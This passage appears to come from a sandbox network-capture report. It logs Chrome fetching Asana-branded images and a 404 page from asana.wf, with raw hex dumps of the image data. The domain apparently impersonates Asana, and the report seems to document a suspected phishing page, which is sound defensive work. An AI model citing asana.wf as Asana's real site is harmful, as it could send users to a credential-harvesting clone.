                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC7486INData Raw: 52 49 46 46 36 1d 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 2f 03 00 1f 02 00 41 4c 50 48 17 01 00 00 01 67 60 90 6d e4 d8 1d c1 d7 e4 3e 22 22 f8 f5 3a 00 6a b5 6d cb 9b e7 04 17 48 ca f0 a9 76 87 b8 f8 b2 66 8f 96 54 97 60 ae 65 cf 0c df b7 d5 9f 7f 80 a7 74 47 f4 7f 02 94 6d 6e c6 64 c3 9b 95 9a f2 27 62 f2 e2 60 ce 78 b2 63 b9 45 f8 f2 c3 59 21 73 9a 0c d9 90 14 be 1c 71 56 90 8e 93 25 bb a4 57 4f 4c 2a 24 53 16 96 5d 51 79 74 45 f7 8b 2b 86 de 5d b1 fe e9 8a bd e8 8a 9b 84 ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe ff 09 1b 5d 71 f3 e9 8a
                                                                                                                                                                                                                    Data Ascii: RIFF6WEBPVP8X/ALPHg`m>"":jmHvfT`etGmnd'b`xcEY!sqV%WOL*$S]QytE+]???????]q


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    40192.168.2.164974794.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC598OUTGET /img/HOME24-web-hero-IDC-2x-en-US.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:59 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "f0e-6164f3d1507d1"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 3854
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC3854INData Raw: 52 49 46 46 06 0f 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 2f 03 00 1f 02 00 41 4c 50 48 17 01 00 00 01 67 60 90 6d e4 d8 1d c1 d7 e4 3e 22 22 f8 f5 3a 00 6a b5 6d cb 9b e7 04 17 48 ca f0 a9 76 87 b8 f8 b2 66 8f 96 54 97 60 ae 65 cf 0c df b7 d5 9f 7f 80 a7 74 47 f4 7f 02 94 6d 6e c6 64 c3 9b 95 9a f2 27 62 f2 e2 60 ce 78 b2 63 b9 45 f8 f2 c3 59 21 73 9a 0c d9 90 14 be 1c 71 56 90 8e 93 25 bb a4 57 4f 4c 2a 24 53 16 96 5d 51 79 74 45 f7 8b 2b 86 de 5d b1 fe e9 8a bd e8 8a 9b 84 ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe ff 09 1b 5d 71 f3 e9 8a
                                                                                                                                                                                                                    Data Ascii: RIFFWEBPVP8X/ALPHg`m>"":jmHvfT`etGmnd'b`xcEY!sqV%WOL*$S]QytE+]???????]q


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    41192.168.2.164974894.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC353OUTGET /img/card-zoom-1x.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC225INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:59 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "235c-6164f3d14f831"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 9052
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC7967INData Raw: 52 49 46 46 54 23 00 00 57 45 42 50 56 50 38 20 48 23 00 00 50 ec 00 9d 01 2a 30 02 75 01 3e 91 46 9f 4a 25 a4 23 21 a5 73 5a 40 b0 12 09 69 6e bb c2 4e 39 73 32 76 cb e3 bb b5 c5 12 d9 3d c2 cd b5 01 5d d6 d3 a1 fa 69 97 bf 5a f6 03 f2 85 f0 0f a8 77 4a cf 46 cf da 32 18 78 31 45 de c3 ea 7c 0a 66 89 13 b9 22 29 95 cd 75 be 6b 18 34 35 dc 36 1f dd 88 9e 9f 02 d8 e2 d9 4c 2c 85 49 4a a9 0f 42 f7 53 fa 98 f1 06 01 34 6e 47 18 05 08 ca 00 51 e5 73 97 ef 69 1f 4c e1 fe 8f 65 71 f0 73 f7 6d 52 4a 3b 88 8e cb 4e 2d b4 c6 37 9f 4d 15 75 22 7d 11 4e 36 1f e2 5b a3 66 6d 82 c3 77 c5 2e 76 8a 80 19 b6 74 1b 41 97 1b 35 5d d6 b7 00 28 bd 71 e9 81 7f 89 17 a5 64 d2 0a 8f 43 9e a1 66 4d 87 08 8c 82 e6 61 49 82 af 5a 6d c3 3d 3e cf cc 99 49 e6 33 b3 f4 67 7b 11 c7 5c
                                                                                                                                                                                                                    Data Ascii: RIFFT#WEBPVP8 H#P*0u>FJ%#!sZ@inN9s2v=]iZwJF2x1E|f")uk456L,IJBS4nGQsiLeqsmRJ;N-7Mu"}N6[fmw.vtA5](qdCfMaIZm=>I3g{\
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC1085INData Raw: cf 39 dc a9 9d 30 67 fc 87 fa 70 cd 48 86 ee fd 37 af 58 b1 7e 1a 04 6f b2 3a 53 10 78 16 85 c0 1c 7a 49 7e 37 82 19 17 45 5d f7 b6 bd 85 fa 43 2f 6e ac 1f 49 6d 28 39 d3 7b 64 fb d9 b1 f4 f1 f6 5d bc 2d 13 e8 0d 30 56 76 0a 23 00 cd ed d5 77 21 ef 9d 12 8a 84 a7 8b 2f 64 a1 7c 56 0b 82 48 ac dc 90 28 4d f1 5f 24 1c 72 3d ed 77 9c 3d 28 58 49 73 d7 e0 10 0c f6 bb c5 e2 70 ad 36 9d 4e 5c 13 04 1a f6 2e b9 74 7a d1 e0 9e d1 7e 33 8c ca fe d2 60 41 7a 82 a0 de 8c be de b1 a4 66 5b f3 49 65 6d d7 8e 79 e5 e7 27 d1 3b a1 a5 3a b6 49 31 6e 5c e0 85 8f 4a 18 aa 06 fe 69 28 f4 e3 ab e3 ea 22 d5 9c 65 5b 04 87 5b 79 aa 95 c2 ac 68 99 76 16 9b e6 8c 40 4b c9 23 3a 96 4f 3c 7c 6d e2 f7 18 51 ba cc e8 5b 07 0c d1 f5 08 52 c7 b6 70 ab 88 9b 31 a2 7c ac 4f 0a 1b eb 24
                                                                                                                                                                                                                    Data Ascii: 90gpH7X~o:SxzI~7E]C/nIm(9{d]-0Vv#w!/d|VH(M_$r=w=(XIsp6N\.tz~3`Azf[Iemy';:I1n\Ji("e[[yhv@K#:O<|mQ[Rp1|O$


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    42192.168.2.164974994.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC366OUTGET /img/card-figma-asana-customer.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC226INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:59 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "3318-6164f3d14f831"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 13080
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC7966INData Raw: 52 49 46 46 10 33 00 00 57 45 42 50 56 50 38 20 04 33 00 00 d0 4c 01 9d 01 2a 30 02 75 01 3e 91 40 9b 49 25 a3 a3 26 2a 91 eb 38 c0 12 09 67 6d f6 f2 8c 4b 99 bc 07 da 2d d0 ae f5 79 b1 ca 36 d7 1c f2 8f de a4 a4 26 07 a8 2f 9d 6a c1 63 0d 9a 5d c8 f0 17 7f 3b 8c 33 9e 95 53 39 9f c1 fa 1c fa 43 78 01 fd 9b d4 57 a5 b7 ee f7 b2 3f ed 89 c7 e7 cd 6b 6d 71 a1 aa 93 d7 a9 4e 73 e8 3e b4 a0 6f db de d2 99 ca 76 46 08 ae d9 53 44 76 1f 59 8c 7a dd 90 88 74 c0 61 40 73 a0 8f 68 1a 5c 3b 83 ea ef c8 32 e5 b8 24 77 f2 a3 01 9f b8 97 3c 8f 77 12 fe b2 f7 0f ab 7a cd 19 5b 70 1d f1 e9 2f d3 fc 78 13 b7 da c0 ff eb 35 90 9e c2 99 3e dd 0b 6d 5b 02 03 21 bf 8e c7 f9 b0 11 14 18 b0 bc 44 76 13 55 b6 a1 9f f4 a5 b4 9a 4c 39 8f 93 64 20 70 ca a0 b7 15 dd a0 0b c6 f8 a3
                                                                                                                                                                                                                    Data Ascii: RIFF3WEBPVP8 3L*0u>@I%&*8gmK-y6&/jc];3S9CxW?kmqNs>ovFSDvYzta@sh\;2$w<wz[p/x5>m[!DvUL9d p
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC5114INData Raw: 92 0d f5 08 29 03 93 5c 0b 2e f3 ae 53 2d ae 4e 30 ae 83 10 6f da 3e 74 1a 67 a2 48 55 98 d0 5f fd bc b0 ef c9 84 96 91 c6 74 55 86 a3 b4 12 24 fc d3 3f fc 22 a2 37 7e 44 f1 8d 10 9e 4e bc 8f 21 1c e8 44 c6 12 59 62 81 82 5e 2b f9 08 05 9d 7a f6 92 fa 24 a3 bd f2 72 df f2 a6 05 c1 32 5e 96 24 84 47 33 ff 94 b7 f4 b6 d8 4f b3 5b 9c 00 68 5a cc 0d 59 8d b0 75 ac 6e 75 75 e4 22 79 77 ea e0 ff 7f 29 29 41 26 7e 83 ee 21 ec dc a4 ab 79 63 0c df ac 50 c6 1f c6 ed 0f e7 3f 9c 06 5b 3d 3d 98 45 bf 0c e1 db 21 05 d6 ce 0a dc db 43 67 7c 50 b5 47 df da 2f 16 c3 4c cb 88 23 72 69 1b b2 b7 00 89 08 00 14 46 81 74 6d 02 fb 50 55 70 e1 c8 f7 7a d3 20 91 e0 c1 26 f8 0a 44 d9 be 59 c5 a7 cb 92 d1 3a 84 44 5e 41 f4 7f c7 49 13 71 fa 5c b9 3b 67 3f 97 9c 62 00 87 89 9f 45
                                                                                                                                                                                                                    Data Ascii: )\.S-N0o>tgHU_tU$?"7~DN!DYb^+z$r2^$G3O[hZYunuu"yw))A&~!ycP?[==E!Cg|PG/L#riFtmPUpz &DY:D^AIq\;g?bE


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    43192.168.2.164975094.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC371OUTGET /img/card-sony-music-asana-customer.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC226INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:59 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "31cc-6164f3d14f831"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 12748
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC7966INData Raw: 52 49 46 46 c4 31 00 00 57 45 42 50 56 50 38 20 b8 31 00 00 f0 08 01 9d 01 2a 30 02 75 01 3e 91 42 9c 4b 25 a3 a6 27 a3 11 0b 50 f0 12 09 65 6e c8 7c 34 f1 aa 6d a5 b7 66 bc cf 2e ae 69 f3 30 39 dc 06 fc 9e 94 ff b4 ee ed f3 4d e6 85 e9 8f fa 97 4c f7 ad d7 a3 27 4d 65 8b 5f e7 bf d5 f8 b3 e7 7b e6 7e e9 fb 31 e7 fe d6 bf 9b fe 52 fd ff ae 2f ee 7c 1f f9 dd a8 5f b5 ff de f0 26 80 5f d2 ff c3 ff d7 f3 fd fb bf 3b 7c 41 7f a0 79 e9 ff 93 c5 cb f1 1f f5 7d 83 ff a8 7f a7 f4 9c d2 2a a2 fd 2f 3f 75 7d 89 4a 3b f1 c5 f5 1b 28 d9 46 ca 36 51 b2 8e 67 51 b2 8d 94 6c 18 ed 92 4d 51 7d 20 75 a9 0d fd a5 fc 39 48 ad 56 b2 6d 0b 71 4f c8 f7 f8 72 90 df 8b 81 22 44 5d 93 ca a4 51 b2 c4 6a d9 d8 42 4e fa db d2 8a a2 43 63 6e 74 ef 72 3b a2 41 2e 37 ba 06 0b 71 30 17
                                                                                                                                                                                                                    Data Ascii: RIFF1WEBPVP8 1*0u>BK%'Pen|4mf.i09ML'Me_{~1R/|_&_;|Ay}*/?u}J;(F6QgQlMQ} u9HVmqOr"D]QjBNCcntr;A.7q0
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC4782INData Raw: 8b bf a7 01 c3 a5 05 23 cf 41 c3 f7 13 16 5a 90 af bc dd cb 87 ee e7 f7 fe b9 63 79 f9 43 13 1f 23 bd db c9 6d d8 a6 16 36 30 ab c3 fa 87 61 52 10 94 8b 24 be b9 dd 4d 67 91 62 80 28 f8 10 a3 db 83 9d 18 00 a8 21 08 00 75 6d 38 a7 e9 4d 38 cf 46 e2 fe 15 15 dc 9f 11 9b 8c e5 6f e8 d1 7c c6 17 56 9d b2 eb 9a e7 4f 8a 7b 8b 71 0e ff 51 66 c9 8b 81 a6 cf 9c 1e 98 50 c9 2d 3b ff cb 07 f2 ae 34 ea 6a e1 3c 12 9f 39 43 6a b8 8f e4 b2 89 df 84 ff 46 7f 1c 72 38 b0 d2 aa f9 69 ae eb 4a 14 f9 f1 f3 38 18 7b 23 ce f5 7b 12 d7 79 49 80 ad 89 c8 80 31 e8 ce 1f 63 a0 46 61 45 6f 3c 78 49 55 18 bc 0d da 6b 5d 8b 0f 18 35 0c f9 bb d5 86 38 74 ba 2d aa 24 63 7c f1 5b 88 7c 32 2d 1a ac 09 a7 c3 ad 67 06 fa be 40 de bd e7 a1 da fb cd a5 e8 9e b9 c9 32 d1 42 a4 cd a2 db fd
                                                                                                                                                                                                                    Data Ascii: #AZcyC#m60aR$Mgb(!um8M8Fo|VO{qQfP-;4j<9CjFr8iJ8{#{yI1cFaEo<xIUk]58t-$c|[|2-g@2B


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    44192.168.2.164975194.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC585OUTGET /assets/svg/icons.svg HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC180INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:59 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Content-Length: 271
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC271INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 73 61 6e 61 2e 77 66 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e
                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at asana.wf Port 443</address>


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    45192.168.2.164975294.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC362OUTGET /img/home24-demo-thumbnail.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC226INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:59 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "a108-6164f3d1507d1"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 41224
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC7966INData Raw: 52 49 46 46 00 a1 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 2f 03 00 2f 03 00 41 4c 50 48 cb 01 00 00 01 90 55 db b6 dd 36 07 82 21 5c 28 42 92 04 41 24 06 0a 92 b4 08 2c 06 32 03 9b c9 15 83 73 fb cc 3b 5f e7 63 46 c4 04 c4 4b 4f f3 8f db 31 ca e1 71 db ee 5b bc e9 74 19 85 71 9b 5e d7 2e a3 38 9e db 2b e6 63 94 c7 be bc 68 1d 15 32 d7 17 ac a3 46 e6 fa 9f 79 54 c9 5c fe d1 8e 32 31 7a fb 6b 1b 85 72 8f 88 69 54 ca 9c 22 2e a5 62 ec d1 46 ad cc d3 43 b5 58 b6 62 31 9e 6f d5 e2 7a 54 8b 3e aa 65 f2 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff
                                                                                                                                                                                                                    Data Ascii: RIFFWEBPVP8X//ALPHU6!\(BA$,2s;_cFKO1q[tq^.8+ch2FyT\21zkriT".bFCXb1ozT>e
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC8000INData Raw: a7 15 5b 24 ed e8 bd 13 bb 3f c4 56 f7 a7 79 3e 4b 35 29 d9 c1 f3 c0 a3 02 d0 68 ab a2 fc a4 47 9e 19 92 e4 3d 91 cf 46 5e 1d 8a 28 03 19 d3 2b 0d 9e ca 54 c5 64 9e e0 ce a8 b0 8e 69 1e 21 e6 7b 8d 13 80 3f 81 f8 e0 fb 62 0f d5 89 67 13 72 5f 66 07 34 8c 00 04 01 4c 52 28 d2 cf 73 9a b8 93 14 84 88 2f 3e 1a c5 e1 e3 6f c3 d3 fd 9b db 4d 7c 00 ea c4 26 be 34 5a ff 42 41 4d ef a5 65 6d 9d 9a ae 2c 9a 6f cf f4 7a 92 5b b1 d9 44 46 1b 68 5e 37 d2 da 12 79 8e f4 3c 85 28 a5 be da cb 1e 7e 14 99 58 11 ed 1c df 3b 44 1d e2 6b 44 78 b3 c0 26 a4 47 89 a0 a3 10 5b 22 ad cb a2 c3 c6 ae a3 41 f2 45 9f 2a f3 9f c5 10 a2 90 01 c3 7b 9b 84 23 d8 a5 b2 77 96 15 7d 2e 58 8a 3a 09 9e f5 ac df 59 b1 07 65 bd 32 df 85 7d 1e 6d 06 e4 6f 5f e6 41 d6 3d 00 96 d1 c2 f1 fa 7f 83
                                                                                                                                                                                                                    Data Ascii: [$?Vy>K5)hG=F^(+Tdi!{?bgr_f4LR(s/>oM|&4ZBAMem,oz[DFh^7y<(~X;DkDx&G["AE*{#w}.X:Ye2}mo_A=
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC8000INData Raw: 4f 1c 68 37 cd 7d 1a 10 2d 4f 1c 24 85 4a f1 e3 83 4f 4c 84 af 0b 4c 07 eb bc ab 2e 37 c9 bf 33 f8 89 cf 1b c7 fe ad b6 32 63 46 7e 66 00 d9 65 3b 23 f4 b8 c7 2b 9c 87 50 73 9f 9a 5e 22 a5 bf bb f4 40 13 fa 18 a3 9c a9 54 b3 e0 9d 60 00 36 34 f0 56 20 88 e9 54 0d 00 ef 93 bd 52 35 ea 95 f0 e1 cb 8e e4 e9 54 3b 11 f6 dd 29 b7 02 d9 f2 fc da d6 de e0 c6 e1 b7 3a 28 a6 9a 77 60 0d ac a6 91 61 82 8e b5 1d 4a d8 62 ac 2e 99 2c 34 ae d1 80 77 e4 7d b5 d0 21 30 0a db 31 82 25 a2 bc f1 72 7c 09 1d 5c 79 44 35 aa b2 30 1d 43 30 17 48 3b a5 26 0e 40 ab 31 7a 3e 92 0e 57 67 12 1b 8f 5c 69 33 7a ba 73 bf 19 40 b5 b7 51 54 08 8b 9b 87 df cd 5a 45 67 0a eb eb f3 b9 4b 03 a8 47 4c e2 86 3e b4 53 c7 5f 7a 46 84 0b 6a 01 59 cb 9e e7 b1 57 f6 7d 19 34 43 1e c9 1b 5d 52 3d
                                                                                                                                                                                                                    Data Ascii: Oh7}-O$JOLL.732cF~fe;#+Ps^"@T`64V TR5T;):(w`aJb.,4w}!01%r|\yD50C0H;&@1z>Wg\i3zs@QTZEgKGL>S_zFjYW}4C]R=
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC8000INData Raw: d6 57 67 df 91 b1 74 04 60 f0 18 72 0d c8 23 85 62 9c bd 80 74 c3 66 28 f5 9c 7a 2d 42 ef c4 ac 79 89 7d 0e 89 a9 8d cc 08 39 ce 03 f2 3d 5a c3 f2 a8 4a dc cc 36 08 de e3 af 51 c5 61 a3 41 9d 23 1b 11 c0 b1 0c 39 d8 f9 d0 8a 2e d0 eb 88 e5 f7 65 6c 39 25 5b 2f 00 b4 5b 6b 01 41 af 25 be e7 f6 49 07 da a2 53 c9 8c ca 26 a7 bf 4e 81 a9 1a 2a de 5f be 8a f9 d1 79 26 ae 9d e2 47 c7 20 5b 39 a2 88 1e 21 a4 0c e7 cb e5 9c 7f cf 2c 5b 4d ef 4c 1d 6a 11 c8 f4 51 8a ff be c3 45 f1 b9 39 57 fa dd 73 1a d1 74 d6 71 29 e2 94 1f 01 b1 50 a0 63 8b c4 22 c9 c7 75 1a 31 d5 43 cb dd 22 f5 11 d4 ec 8f ab d6 68 97 10 f6 72 7a ce 39 a4 18 40 b2 3a e2 f0 c9 e3 96 b0 b8 b2 60 fa 94 85 06 58 c3 97 fe e3 9a d9 91 bf c1 91 46 12 8d ae 3f 3d 1f cc e1 4c 47 44 0c 1f a6 b3 bd 14 ef
                                                                                                                                                                                                                    Data Ascii: Wgt`r#btf(z-By}9=ZJ6QaA#9.el9%[/[kA%IS&N*_y&G [9!,[MLjQE9Wstq)Pc"u1C"hrz9@:`XF?=LGD
